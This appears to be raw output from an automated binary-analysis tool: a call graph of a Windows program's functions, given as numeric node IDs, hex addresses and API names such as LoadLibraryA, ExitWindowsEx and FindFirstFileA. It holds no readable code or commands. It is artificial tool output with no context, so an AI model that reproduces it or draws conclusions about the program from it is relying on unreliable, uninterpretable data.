std::_Mutex::_Mutex 8 API calls 76853->76856 76855 1113a352 76854->76855 76859 1113a373 76855->76859 77152 11057eb0 308 API calls std::_Mutex::_Mutex 76855->77152 76860 1113a204 76856->76860 76858->76853 77153 1110fff0 InterlockedIncrement 76859->77153 76860->76803 76865 1113a20b GetLastError 76860->76865 76861->76849 77058 11142d90 76861->77058 76862 1113a3f5 77161 1103f980 68 API calls 76862->77161 76877 1113a485 76863->76877 76868 11147060 std::_Mutex::_Mutex 21 API calls 76865->76868 76868->76803 76870 1113a400 77162 1103f940 68 API calls 76870->77162 76871 1113a398 77154 1104d790 629 API calls 76871->77154 76874 1113a40b 77163 11110000 InterlockedDecrement 76874->77163 76875 1113a3a3 77155 1104ecd0 629 API calls 76875->77155 76878 1113a4cd 76877->76878 76879 1113a4aa 76877->76879 76880 1113a4d9 GetTickCount 76877->76880 76877->76903 76878->76880 76878->76903 76883 11147060 std::_Mutex::_Mutex 21 API calls 76879->76883 76884 1113a4eb 76880->76884 76880->76903 76882 1113a3d9 76882->76839 76886 1113a4b5 GetTickCount 76883->76886 76887 11143a50 145 API calls 76884->76887 76885 1113a3ae 77156 1104ed40 629 API calls 76885->77156 76886->76903 76889 1113a4f7 76887->76889 76891 11147af0 269 API calls 76889->76891 76890 1113a3b9 77157 1104d7d0 629 API calls 76890->77157 76893 1113a502 76891->76893 76895 11143a50 145 API calls 76893->76895 76894 1113a3c4 76894->76839 77158 110ec320 285 API calls 76894->77158 76897 1113a515 76895->76897 77164 110261a0 LoadLibraryA 76897->77164 76899 1113a522 76899->76899 77165 1112d6e0 GetProcAddress SetLastError 76899->77165 76901 1113a569 76902 1113a573 FreeLibrary 76901->76902 76901->76903 76902->76903 76903->76780 77166 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 76904->77166 76906 11029973 77168 11089fe0 269 API calls 2 library calls 76906->77168 76909 1102995e 76909->76906 77167 110278b0 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection 76909->77167 76910 1102997e 76910->76773 76912 11134872 76911->76912 76913 11134b94 76911->76913 76914 1105e820 79 API calls 76912->76914 76915 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 76913->76915 76916 11134892 76914->76916 76917 11134bac 76915->76917 76916->76913 76918 1113489a GetLocalTime 76916->76918 76959 11134310 76917->76959 76919 111348d1 LoadLibraryA 76918->76919 76920 111348b0 76918->76920 77169 11009940 LoadLibraryA 76919->77169 76921 11147060 std::_Mutex::_Mutex 21 API calls 76920->76921 76923 111348c5 76921->76923 76923->76919 76924 11134925 77170 110161e0 LoadLibraryA 76924->77170 76926 11134930 GetCurrentProcess 76927 11134955 GetProcAddress 76926->76927 76928 1113496d GetProcessHandleCount 76926->76928 76927->76928 76929 11134976 SetLastError 76927->76929 76930 1113497e 76928->76930 76929->76930 76931 111349a2 76930->76931 76932 11134988 GetProcAddress 76930->76932 76934 111349b0 GetProcAddress 76931->76934 76935 111349ca 76931->76935 76932->76931 76933 111349d7 SetLastError 76932->76933 76933->76934 76934->76935 76936 111349e4 SetLastError 76934->76936 76937 111349ef GetProcAddress 76935->76937 76936->76937 76938 11134a01 K32GetProcessMemoryInfo 76937->76938 76939 11134a0f SetLastError 76937->76939 76940 11134a17 76938->76940 76939->76940 76941 11147060 std::_Mutex::_Mutex 21 API calls 76940->76941 76945 11134a8d 76940->76945 76941->76945 76942 11134b6a 76943 11134b7a FreeLibrary 76942->76943 76944 11134b7d 76942->76944 76943->76944 76946 11134b87 FreeLibrary 76944->76946 76947 11134b8a 76944->76947 76945->76942 76949 1105e820 79 API calls 76945->76949 76946->76947 76947->76913 76948 11134b91 FreeLibrary 76947->76948 76948->76913 76950 11134ade 76949->76950 76951 1105e820 79 API calls 76950->76951 76952 11134b06 76951->76952 76953 1105e820 79 API calls 76952->76953 76954 11134b2d 76953->76954 76955 1105e820 79 API calls 76954->76955 76956 11134b54 76955->76956 76956->76942 76957 11134b65 76956->76957 77171 11027de0 265 API calls 2 library calls 76957->77171 76961 1113433d 76959->76961 76960 111347f9 76960->76779 76960->76780 77062 11139a70 76960->77062 76961->76960 76962 110d1930 268 API calls 76961->76962 76963 1113439e 76962->76963 76964 110d1930 268 API calls 76963->76964 76965 111343a9 76964->76965 76966 111343d7 76965->76966 76967 111343ee 76965->76967 77172 11029a70 265 API calls 2 library calls 76966->77172 76969 11147060 std::_Mutex::_Mutex 21 API calls 76967->76969 76971 111343fc 76969->76971 77173 110d1530 265 API calls 76971->77173 77059 11142daf 77058->77059 77060 11142d9a 77058->77060 77059->76849 77174 11142400 77060->77174 77063 11139eaf 77062->77063 77066 11139a8d 77062->77066 77064 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77063->77064 77065 11139ebe 77064->77065 77065->76783 77066->77063 77067 11145c70 std::_Mutex::_Mutex 90 API calls 77066->77067 77068 11139acc 77067->77068 77068->77063 77069 1105e820 79 API calls 77068->77069 77070 11139afb 77069->77070 77306 1112d860 77070->77306 77072 11139c40 PostMessageA 77074 11139c55 77072->77074 77073 1105e820 79 API calls 77075 11139c3c 77073->77075 77076 11139c65 77074->77076 77315 11110000 InterlockedDecrement 77074->77315 77075->77072 77075->77074 77078 11139c6b 77076->77078 77079 11139c8d 77076->77079 77081 11139cc3 std::ios_base::_Tidy 77078->77081 77082 11139cde 77078->77082 77316 11131320 315 API calls std::_Mutex::_Mutex 77079->77316 77090 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77081->77090 77084 11143a50 145 API calls 77082->77084 77083 11139c95 77317 11147ad0 267 API calls 77083->77317 77087 11139ce3 77084->77087 77091 11147af0 269 API calls 77087->77091 77088 11139c9f 77318 1112da60 SetDlgItemTextA 77088->77318 77093 11139cda 77090->77093 77094 11139cea SetWindowTextA 77091->77094 77092 11139cb0 std::ios_base::_Tidy 77092->77078 77093->76783 77096 11139d06 77094->77096 77103 11139d0d std::ios_base::_Tidy 77094->77103 77095 11146710 271 API calls 77098 11139beb 77095->77098 77319 111361c0 299 API calls 5 library calls 77096->77319 77098->77072 77098->77073 77099 11139d64 77100 11139d78 77099->77100 77101 11139e3c 77099->77101 77104 11139d9c 77100->77104 77322 111361c0 299 API calls 5 library calls 77100->77322 77106 11139e5d 77101->77106 77110 11139e4b 77101->77110 77111 11139e44 77101->77111 77102 11139d37 77102->77099 77107 11139d4c 77102->77107 77103->77099 77103->77102 77320 111361c0 299 API calls 5 library calls 77103->77320 77324 110f8b70 86 API calls 77104->77324 77328 110f8b70 86 API calls 77106->77328 77321 11132120 147 API calls 77107->77321 77327 11132120 147 API calls 77110->77327 77326 111361c0 299 API calls 5 library calls 77111->77326 77115 11139e68 77115->77063 77121 11139e6c IsWindowVisible 77115->77121 77116 11139da7 77116->77063 77122 11139daf IsWindowVisible 77116->77122 77118 11139d5c 77118->77099 77119 11139e5a 77119->77106 77120 11139d86 77120->77104 77123 11139d92 77120->77123 77121->77063 77124 11139e7e IsWindowVisible 77121->77124 77122->77063 77125 11139dc6 77122->77125 77323 11132120 147 API calls 77123->77323 77124->77063 77127 11139e8b EnableWindow 77124->77127 77128 11145c70 std::_Mutex::_Mutex 90 API calls 77125->77128 77329 11132120 147 API calls 77127->77329 77131 11139dd1 77128->77131 77129 11139d99 77129->77104 77131->77063 77132 11139ddc GetForegroundWindow IsWindowVisible 77131->77132 77134 11139e01 77132->77134 77135 11139df6 EnableWindow 77132->77135 77133 11139ea2 EnableWindow 77133->77063 77325 11132120 147 API calls 77134->77325 77135->77134 77137 11139e08 77138 11139e1e EnableWindow 77137->77138 77139 11139e17 SetForegroundWindow 77137->77139 77140 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77138->77140 77139->77138 77141 11139e38 77140->77141 77141->76783 77142->76840 77143->76848 77144->76827 77145->76835 77146->76815 77147->76802 77148->76812 77149->76828 77150->76838 77151->76829 77152->76859 77153->76871 77154->76875 77155->76885 77156->76890 77157->76894 77158->76882 77159->76851 77160->76862 77161->76870 77162->76874 77163->76882 77164->76899 77165->76901 77166->76909 77167->76909 77168->76910 77169->76924 77170->76926 77171->76942 77175 1114243f 77174->77175 77228 11142438 std::ios_base::_Tidy 77174->77228 77176 111101b0 std::_Mutex::_Mutex 265 API calls 77175->77176 77177 11142446 77176->77177 77179 11142476 77177->77179 77181 11061aa0 301 API calls 77177->77181 77178 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77180 11142d8a 77178->77180 77182 11062220 275 API calls 77179->77182 77180->77059 77181->77179 77183 111424b2 77182->77183 77184 111424b9 RegCloseKey 77183->77184 77185 111424c0 std::_Mutex::_Mutex 77183->77185 77184->77185 77186 111424cf 77185->77186 77187 1102a6d0 354 API calls 77185->77187 77188 11145990 267 API calls 77186->77188 77187->77186 77189 111424ec 77188->77189 77190 11143e00 std::_Mutex::_Mutex 8 API calls 77189->77190 77191 11142500 77190->77191 77192 11142517 77191->77192 77193 11063880 330 API calls 77191->77193 77194 111101b0 std::_Mutex::_Mutex 265 API calls 77192->77194 77193->77192 77195 1114251e 77194->77195 77196 1114253a 77195->77196 77197 11061710 293 API calls 77195->77197 77198 111101b0 std::_Mutex::_Mutex 265 API calls 77196->77198 77197->77196 77199 11142553 77198->77199 77200 1114256f 77199->77200 77201 11061710 293 API calls 77199->77201 77202 111101b0 std::_Mutex::_Mutex 265 API calls 77200->77202 77201->77200 77203 11142588 77202->77203 77204 111425a4 77203->77204 77205 11061710 293 API calls 77203->77205 77206 11061290 268 API calls 77204->77206 77205->77204 77207 111425cd 77206->77207 77208 11061290 268 API calls 77207->77208 77222 111425e7 77208->77222 77209 11142915 77210 110d1930 268 API calls 77209->77210 77213 11142cf9 77209->77213 77212 11142933 77210->77212 77211 11061320 274 API calls 77211->77222 77216 1105e820 79 API calls 77212->77216 77219 11061170 69 API calls 77213->77219 77214 11142905 77215 11147060 std::_Mutex::_Mutex 21 API calls 77214->77215 77215->77209 77218 11142970 77216->77218 77217 11147060 21 API calls std::_Mutex::_Mutex 77217->77222 77220 11142abd 77218->77220 77223 11061290 268 API calls 77218->77223 77221 11142d52 77219->77221 77225 11061a70 274 API calls 77220->77225 77224 11061170 69 API calls 77221->77224 77222->77209 77222->77211 77222->77214 77222->77217 77226 11132900 86 API calls 77222->77226 77245 11081e70 86 API calls 77222->77245 77251 11081f20 86 API calls std::_Mutex::_Mutex 77222->77251 77227 1114298e 77223->77227 77224->77228 77229 11142ad9 77225->77229 77226->77222 77230 11061320 274 API calls 77227->77230 77228->77178 77301 110684e0 298 API calls std::_Mutex::_Mutex 77229->77301 77231 1114299d 77230->77231 77233 111429d2 77231->77233 77236 11147060 std::_Mutex::_Mutex 21 API calls 77231->77236 77241 11061320 274 API calls 77231->77241 77234 11061290 268 API calls 77233->77234 77237 111429e8 77234->77237 77235 11142b03 77238 11142b33 EnterCriticalSection 77235->77238 77248 11142b07 77235->77248 77236->77231 77239 11061320 274 API calls 77237->77239 77240 11060f50 271 API calls 77238->77240 77257 111429f8 77239->77257 77243 11142b50 77240->77243 77241->77231 77244 11061a70 274 API calls 77243->77244 77247 11142b66 77244->77247 77245->77222 77246 11142a31 77249 11061290 268 API calls 77246->77249 77250 11142b7a LeaveCriticalSection 77247->77250 77254 1102b140 283 API calls 77247->77254 77248->77238 77302 11051360 354 API calls 4 library calls 77248->77302 77303 110684e0 298 API calls std::_Mutex::_Mutex 77248->77303 77253 11142a47 77249->77253 77255 11142bce 77250->77255 77256 11142b8e 77250->77256 77251->77222 77252 11147060 std::_Mutex::_Mutex 21 API calls 77252->77257 77259 11061320 274 API calls 77253->77259 77260 11142b77 77254->77260 77261 11134310 273 API calls 77255->77261 77256->77255 77265 11147060 std::_Mutex::_Mutex 21 API calls 77256->77265 77257->77246 77257->77252 77262 11061320 274 API calls 77257->77262 77272 11142a56 77259->77272 77260->77250 77264 11142bd8 77261->77264 77262->77257 77263 11142a91 77267 11061170 69 API calls 77263->77267 77266 110d1930 268 API calls 77264->77266 77268 11142b9c 77265->77268 77270 11142be6 77266->77270 77271 11142a9f 77267->77271 77276 11142010 386 API calls 77268->77276 77269 11147060 std::_Mutex::_Mutex 21 API calls 77269->77272 77304 110d0170 265 API calls std::_Mutex::_Mutex 77270->77304 77273 11061170 69 API calls 77271->77273 77272->77263 77272->77269 77274 11061320 274 API calls 77272->77274 77275 11142aae 77273->77275 77274->77272 77278 11061170 69 API calls 77275->77278 77279 11142ba7 77276->77279 77278->77220 77279->77255 77281 11147060 std::_Mutex::_Mutex 21 API calls 77279->77281 77280 11142c1c 77295 11142c9f 77280->77295 77305 110d1530 265 API calls 77280->77305 77282 11142bc0 77281->77282 77285 11027200 586 API calls 77282->77285 77283 110d0a10 265 API calls 77286 11142cdb 77283->77286 77285->77255 77290 110d0a10 265 API calls 77286->77290 77290->77213 77295->77283 77301->77235 77302->77248 77303->77248 77304->77280 77307 1112d87c 77306->77307 77308 1112d8b7 77307->77308 77310 1112d8a4 77307->77310 77330 1106c340 298 API calls 77308->77330 77311 11147af0 269 API calls 77310->77311 77313 1112d8af 77311->77313 77312 1112d903 77312->77095 77312->77098 77313->77312 77314 11142e60 std::_Mutex::_Mutex 265 API calls 77313->77314 77314->77312 77315->77076 77316->77083 77317->77088 77318->77092 77319->77103 77320->77102 77321->77118 77322->77120 77323->77129 77324->77116 77325->77137 77326->77110 77327->77119 77328->77115 77329->77133 77330->77313 77331 11135c20 77332 11135c29 77331->77332 77338 11135c58 77331->77338 77333 11145ef0 std::_Mutex::_Mutex 90 API calls 77332->77333 77334 11135c2e 77333->77334 77335 11133b00 274 API calls 77334->77335 77334->77338 77336 11135c37 77335->77336 77337 1105e820 79 API calls 77336->77337 77336->77338 77337->77338 77339 6caa607f HeapCreate 77340 1115cca0 77341 1115ccb4 77340->77341 77342 1115ccac 77340->77342 77343 1116406b _calloc 66 API calls 77341->77343 77344 1115ccc8 77343->77344 77345 1115ccd4 77344->77345 77346 1115ce00 77344->77346 77352 1115c8e0 CoInitializeSecurity CoCreateInstance 77344->77352 77348 11163aa5 _free 66 API calls 77346->77348 77349 1115ce28 77348->77349 77350 1115ccf1 77350->77346 77351 1115cde4 SetLastError 77350->77351 77351->77350 77353 1115c955 wsprintfW SysAllocString 77352->77353 77354 1115cad4 77352->77354 77359 1115c99b 77353->77359 77355 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77354->77355 77357 1115cb00 77355->77357 77356 1115cac1 SysFreeString 77356->77354 77357->77350 77358 1115caa9 77358->77356 77359->77356 77359->77358 77359->77359 77360 1115ca2c 77359->77360 77361 1115ca1a wsprintfW 77359->77361 77369 110978f0 77360->77369 77361->77360 77363 1115ca3e 77364 110978f0 266 API calls 77363->77364 77365 1115ca53 77364->77365 77374 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 77365->77374 77367 1115ca97 77375 110979a0 InterlockedDecrement SysFreeString std::ios_base::_Tidy 77367->77375 77370 111101b0 std::_Mutex::_Mutex 265 API calls 77369->77370 77371 11097923 77370->77371 77372 11097936 SysAllocString 77371->77372 77373 11097954 77371->77373 77372->77373 77373->77363 77374->77367 77375->77358 77376 1102d9f4 77377 1102da01 77376->77377 77378 1102da22 77377->77378 77463 1109f5f0 273 API calls std::_Mutex::_Mutex 77377->77463 77464 11029490 455 API calls std::_Mutex::_Mutex 77378->77464 77381 1102da33 77446 11028690 SetEvent 77381->77446 77383 1102da38 77384 1102da42 77383->77384 77385 1102da4d 77383->77385 77465 110eccf0 636 API calls 77384->77465 77387 1102da6a 77385->77387 77388 1102da6f 77385->77388 77466 11059fb0 SetEvent 77387->77466 77390 1102da77 77388->77390 77391 1102daae 77388->77391 77390->77391 77396 1102daa3 Sleep 77390->77396 77392 11147060 std::_Mutex::_Mutex 21 API calls 77391->77392 77393 1102dab8 77392->77393 77394 1102dac5 77393->77394 77398 1102daf6 77393->77398 77394->77393 77395 1105e820 79 API calls 77394->77395 77397 1102dae8 77395->77397 77396->77391 77397->77398 77467 1102d750 294 API calls std::_Mutex::_Mutex 77397->77467 77403 1102daf3 77398->77403 77447 110b0470 77398->77447 77403->77398 77406 1102db3a 77407 1102db4d 77406->77407 77469 111361c0 299 API calls 5 library calls 77406->77469 77409 1100d620 FreeLibrary 77407->77409 77410 1102de59 77409->77410 77411 1102de70 77410->77411 77412 1100d330 wsprintfA 77410->77412 77414 1102de97 GetModuleFileNameA GetFileAttributesA 77411->77414 77422 1102dfb3 77411->77422 77413 1102de65 77412->77413 77415 11147060 std::_Mutex::_Mutex 21 API calls 77413->77415 77416 1102debf 77414->77416 77414->77422 77415->77411 77418 111101b0 std::_Mutex::_Mutex 265 API calls 77416->77418 77417 11147060 std::_Mutex::_Mutex 21 API calls 77419 1102e062 77417->77419 77420 1102dec6 77418->77420 77472 11147020 FreeLibrary 77419->77472 77424 11143630 267 API calls 77420->77424 77422->77417 77423 1102e06a 77425 1102e0a6 77423->77425 77428 1102e094 ExitWindowsEx 77423->77428 77429 1102e084 ExitWindowsEx Sleep 77423->77429 77433 1102dee8 77424->77433 77426 1102e0b6 77425->77426 77427 1102e0ab Sleep 77425->77427 77430 11147060 std::_Mutex::_Mutex 21 API calls 77426->77430 77427->77426 77428->77425 77429->77428 77431 1102e0c0 ExitProcess 77430->77431 77434 11143780 86 API calls 77433->77434 77435 1102df0d 77434->77435 77435->77422 77436 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 77435->77436 77437 1102df23 77436->77437 77438 1102df3e _memset 77437->77438 77470 11029a70 265 API calls 2 library calls 77437->77470 77440 1102df58 FindFirstFileA 77438->77440 77441 1102df78 FindNextFileA 77440->77441 77443 1102df98 FindClose 77441->77443 77444 1102dfa4 77443->77444 77471 111273e0 291 API calls 5 library calls 77444->77471 77446->77383 77473 110808b0 77447->77473 77452 1102db1a 77456 110eb4a0 77452->77456 77453 110b04b7 77485 11029a70 265 API calls 2 library calls 77453->77485 77457 110b0470 267 API calls 77456->77457 77458 110eb4cd 77457->77458 77501 110ea880 77458->77501 77462 1102db25 77468 110b0660 267 API calls std::_Mutex::_Mutex 77462->77468 77463->77378 77464->77381 77465->77385 77466->77388 77467->77403 77468->77406 77469->77407 77471->77422 77472->77423 77474 110808d4 77473->77474 77475 110808d8 77474->77475 77476 110808ef 77474->77476 77486 11029a70 265 API calls 2 library calls 77475->77486 77478 11080908 77476->77478 77479 110808ec 77476->77479 77482 110b0460 77478->77482 77479->77476 77487 11029a70 265 API calls 2 library calls 77479->77487 77488 11081590 77482->77488 77489 110815dd 77488->77489 77490 110815b1 77488->77490 77493 1108162a wsprintfA 77489->77493 77494 11081605 wsprintfA 77489->77494 77490->77489 77491 110815cb 77490->77491 77492 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77491->77492 77495 110815d9 77492->77495 77500 11029a70 265 API calls 2 library calls 77493->77500 77494->77489 77495->77452 77495->77453 77503 110ea88b 77501->77503 77502 110ea925 77511 110b0660 267 API calls std::_Mutex::_Mutex 77502->77511 77503->77502 77504 110ea8ae 77503->77504 77506 110ea8c5 77503->77506 77512 11029a70 265 API calls 2 library calls 77504->77512 77507 110ea8c2 77506->77507 77508 110ea8f2 SendMessageTimeoutA 77506->77508 77507->77506 77513 11029a70 265 API calls 2 library calls 77507->77513 77508->77502 77511->77462 77514 110310d5 GetNativeSystemInfo 77515 110310e1 77514->77515 77518 11031081 77515->77518 77519 11031145 77515->77519 77526 11031088 77515->77526 77516 110312db GetStockObject GetObjectA 77517 1103130a SetErrorMode SetErrorMode 77516->77517 77522 111101b0 std::_Mutex::_Mutex 265 API calls 77517->77522 77523 111101b0 std::_Mutex::_Mutex 265 API calls 77518->77523 77521 111101b0 std::_Mutex::_Mutex 265 API calls 77519->77521 77524 1103114c 77521->77524 77525 11031346 77522->77525 77523->77526 77582 110fae60 272 API calls std::_Mutex::_Mutex 77524->77582 77528 11028980 268 API calls 77525->77528 77526->77516 77529 11031360 77528->77529 77530 111101b0 std::_Mutex::_Mutex 265 API calls 77529->77530 77531 11031386 77530->77531 77532 11028980 268 API calls 77531->77532 77533 1103139f InterlockedExchange 77532->77533 77535 111101b0 std::_Mutex::_Mutex 265 API calls 77533->77535 77536 110313c7 77535->77536 77537 1108a880 267 API calls 77536->77537 77538 110313df GetACP 77537->77538 77540 11163f93 _sprintf 102 API calls 77538->77540 77541 11031406 77540->77541 77542 111663a3 _setlocale 101 API calls 77541->77542 77543 11031410 77542->77543 77544 11143780 86 API calls 77543->77544 77545 1103143c 77544->77545 77546 111101b0 std::_Mutex::_Mutex 265 API calls 77545->77546 77547 1103145c 77546->77547 77548 11061aa0 301 API calls 77547->77548 77550 11031487 77548->77550 77549 110314d4 77551 110ccc90 4 API calls 77549->77551 77550->77549 77552 111101b0 std::_Mutex::_Mutex 265 API calls 77550->77552 77553 110314fa 77551->77553 77554 110314ae 77552->77554 77555 111101b0 std::_Mutex::_Mutex 265 API calls 77553->77555 77556 11061710 293 API calls 77554->77556 77557 11031501 77555->77557 77556->77549 77558 11125d40 510 API calls 77557->77558 77559 11031523 77558->77559 77560 11114fb0 268 API calls 77559->77560 77561 11031544 77560->77561 77562 111101b0 std::_Mutex::_Mutex 265 API calls 77561->77562 77563 1103155b 77562->77563 77564 11088b30 268 API calls 77563->77564 77565 11031573 77564->77565 77566 111101b0 std::_Mutex::_Mutex 265 API calls 77565->77566 77567 1103158a 77566->77567 77568 1105cdb0 325 API calls 77567->77568 77569 110315ae 77568->77569 77570 1105d1a0 428 API calls 77569->77570 77571 110315d4 77570->77571 77572 11027810 122 API calls 77571->77572 77573 110315d9 77572->77573 77574 1100d620 FreeLibrary 77573->77574 77575 110315f4 77574->77575 77576 1100d330 wsprintfA 77575->77576 77579 1103160d 77575->77579 77577 11031602 77576->77577 77578 11147060 std::_Mutex::_Mutex 21 API calls 77577->77578 77578->77579 77580 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77579->77580 77581 11031773 77580->77581 77582->77526 77583 11089cf0 77584 111103d0 ___DllMainCRTStartup 4 API calls 77583->77584 77585 11089d03 77584->77585 77586 11089d0d 77585->77586 77595 11089430 268 API calls std::_Mutex::_Mutex 77585->77595 77589 11089d34 77586->77589 77596 11089430 268 API calls std::_Mutex::_Mutex 77586->77596 77591 11089d43 77589->77591 77592 11089cc0 77589->77592 77597 11089950 77592->77597 77595->77586 77596->77589 77638 11088c40 6 API calls ___DllMainCRTStartup 77597->77638 77599 11089989 GetParent 77600 1108999c 77599->77600 77601 110899ad 77599->77601 77603 110899a0 GetParent 77600->77603 77602 11145990 267 API calls 77601->77602 77604 110899b9 77602->77604 77603->77601 77603->77603 77605 11164ead std::_Mutex::_Mutex 143 API calls 77604->77605 77606 110899c6 std::ios_base::_Tidy 77605->77606 77607 11145990 267 API calls 77606->77607 77608 110899df 77607->77608 77639 11013dd0 22 API calls 2 library calls 77608->77639 77610 110899fa 77610->77610 77611 11143e00 std::_Mutex::_Mutex 8 API calls 77610->77611 77613 11089a3a std::ios_base::_Tidy 77611->77613 77612 11089a55 77614 11164c77 std::_Mutex::_Mutex 102 API calls 77612->77614 77616 11089a73 std::_Mutex::_Mutex 77612->77616 77613->77612 77615 11142e60 std::_Mutex::_Mutex 265 API calls 77613->77615 77614->77616 77615->77612 77617 1102ad70 std::_Mutex::_Mutex 145 API calls 77616->77617 77629 11089b24 std::ios_base::_Tidy 77616->77629 77619 11089ac3 77617->77619 77618 11162bb7 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 77620 11089c12 77618->77620 77621 11142e60 std::_Mutex::_Mutex 265 API calls 77619->77621 77620->77591 77622 11089acb 77621->77622 77623 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 77622->77623 77624 11089ae2 77623->77624 77625 11081e70 86 API calls 77624->77625 77624->77629 77626 11089afa 77625->77626 77627 11089b3e 77626->77627 77628 11089b01 77626->77628 77630 11081e70 86 API calls 77627->77630 77640 110b7aa0 77628->77640 77629->77618 77632 11089b49 77630->77632 77632->77629 77634 110b7aa0 68 API calls 77632->77634 77636 11089b56 77634->77636 77635 110b7aa0 68 API calls 77635->77629 77636->77629 77637 110b7aa0 68 API calls 77636->77637 77637->77629 77638->77599 77639->77610 77643 110b7a80 77640->77643 77646 111681a3 77643->77646 77649 11168124 77646->77649 77650 11168131 77649->77650 77651 1116814b 77649->77651 77667 1116a1c2 66 API calls __getptd_noexit 77650->77667 77651->77650 77652 11168154 GetFileAttributesA 77651->77652 77655 11168162 GetLastError 77652->77655 77661 11168178 77652->77661 77654 11168136 77668 1116a1af 66 API calls __getptd_noexit 77654->77668 77670 1116a1d5 66 API calls 2 library calls 77655->77670 77658 11089b07 77658->77629 77658->77635 77659 1116813d 77669 1116edc4 11 API calls __waccess_s 77659->77669 77660 1116816e 77671 1116a1af 66 API calls __getptd_noexit 77660->77671 77661->77658 77672 1116a1c2 66 API calls __getptd_noexit 77661->77672 77665 1116818b 77673 1116a1af 66 API calls __getptd_noexit 77665->77673 77667->77654 77668->77659 77669->77658 77670->77660 77671->77658 77672->77665 77673->77660 77674 1116a5cd 77675 1116a5dd 77674->77675 77676 1116a5d8 77674->77676 77680 1116a4d7 77675->77680 77692 11177f37 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 77676->77692 77679 1116a5eb 77681 1116a4e3 ___DllMainCRTStartup 77680->77681 77682 1116a530 77681->77682 77689 1116a580 ___DllMainCRTStartup 77681->77689 77693 1116a373 77681->77693 77682->77689 77743 11026410 77682->77743 77685 1116a543 77686 1116a560 77685->77686 77688 11026410 ___DllMainCRTStartup 7 API calls 77685->77688 77687 1116a373 __CRT_INIT@12 149 API calls 77686->77687 77686->77689 77687->77689 77690 1116a557 77688->77690 77689->77679 77691 1116a373 __CRT_INIT@12 149 API calls 77690->77691 77691->77686 77692->77675 77694 1116a37f ___DllMainCRTStartup 77693->77694 77695 1116a387 77694->77695 77696 1116a401 77694->77696 77752 1116e390 HeapCreate 77695->77752 77698 1116a462 77696->77698 77703 1116a407 77696->77703 77699 1116a467 77698->77699 77700 1116a4c0 77698->77700 77702 1116c4ba ___set_flsgetvalue 3 API calls 77699->77702 77711 1116a390 ___DllMainCRTStartup 77700->77711 77846 1116c7be 79 API calls __freefls@4 77700->77846 77701 1116a38c 77701->77711 77753 1116c82c GetModuleHandleW 77701->77753 77705 1116a46c 77702->77705 77708 1116a425 77703->77708 77703->77711 77840 1116e65b 66 API calls _doexit 77703->77840 77712 1116ac7e __calloc_crt 66 API calls 77705->77712 77709 1116a439 77708->77709 77841 1117226e 67 API calls _free 77708->77841 77844 1116a44c 70 API calls __mtterm 77709->77844 77711->77682 77715 1116a478 77712->77715 77713 1116a39c __RTC_Initialize 77716 1116a3a0 77713->77716 77722 1116a3ac GetCommandLineA 77713->77722 77715->77711 77718 1116a484 DecodePointer 77715->77718 77837 1116e3ae HeapDestroy 77716->77837 77717 1116a42f 77842 1116c50b 70 API calls _free 77717->77842 77724 1116a499 77718->77724 77721 1116a434 77843 1116e3ae HeapDestroy 77721->77843 77778 11177e54 GetEnvironmentStringsW 77722->77778 77727 1116a4b4 77724->77727 77728 1116a49d 77724->77728 77729 11163aa5 _free 66 API calls 77727->77729 77845 1116c548 66 API calls 4 library calls 77728->77845 77729->77711 77733 1116a4a4 GetCurrentThreadId 77733->77711 77734 1116a3ca 77838 1116c50b 70 API calls _free 77734->77838 77738 1116a3ea 77738->77711 77839 1117226e 67 API calls _free 77738->77839 77744 111104e0 77743->77744 77745 11110501 77744->77745 77746 111104ec 77744->77746 77747 11110514 ___DllMainCRTStartup 77744->77747 77863 11110430 77745->77863 77746->77747 77749 11110430 ___DllMainCRTStartup 7 API calls 77746->77749 77747->77685 77751 111104f5 77749->77751 77750 11110508 77750->77685 77751->77685 77752->77701 77754 1116c840 77753->77754 77755 1116c849 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 77753->77755 77847 1116c50b 70 API calls _free 77754->77847 77757 1116c893 TlsAlloc 77755->77757 77760 1116c9a2 77757->77760 77761 1116c8e1 TlsSetValue 77757->77761 77759 1116c845 77759->77713 77760->77713 77761->77760 77762 1116c8f2 77761->77762 77848 1116e417 EncodePointer EncodePointer __init_pointers __initp_misc_winsig 77762->77848 77764 1116c8f7 EncodePointer EncodePointer EncodePointer EncodePointer 77849 11174425 InitializeCriticalSectionAndSpinCount 77764->77849 77766 1116c936 77767 1116c99d 77766->77767 77768 1116c93a DecodePointer 77766->77768 77851 1116c50b 70 API calls _free 77767->77851 77770 1116c94f 77768->77770 77770->77767 77771 1116ac7e __calloc_crt 66 API calls 77770->77771 77772 1116c965 77771->77772 77772->77767 77773 1116c96d DecodePointer 77772->77773 77774 1116c97e 77773->77774 77774->77767 77775 1116c982 77774->77775 77850 1116c548 66 API calls 4 library calls 77775->77850 77777 1116c98a GetCurrentThreadId 77777->77760 77779 1116a3bc 77778->77779 77781 11177e70 77778->77781 77791 11172029 GetStartupInfoW 77779->77791 77780 11177e85 WideCharToMultiByte 77782 11177ea5 77780->77782 77783 11177edd FreeEnvironmentStringsW 77780->77783 77781->77780 77781->77781 77784 1116ac39 __malloc_crt 66 API calls 77782->77784 77783->77779 77785 11177eab 77784->77785 77785->77783 77786 11177eb3 WideCharToMultiByte 77785->77786 77787 11177ec5 77786->77787 77788 11177ed1 FreeEnvironmentStringsW 77786->77788 77789 11163aa5 _free 66 API calls 77787->77789 77788->77779 77790 11177ecd 77789->77790 77790->77788 77792 1116ac7e __calloc_crt 66 API calls 77791->77792 77793 11172047 77792->77793 77795 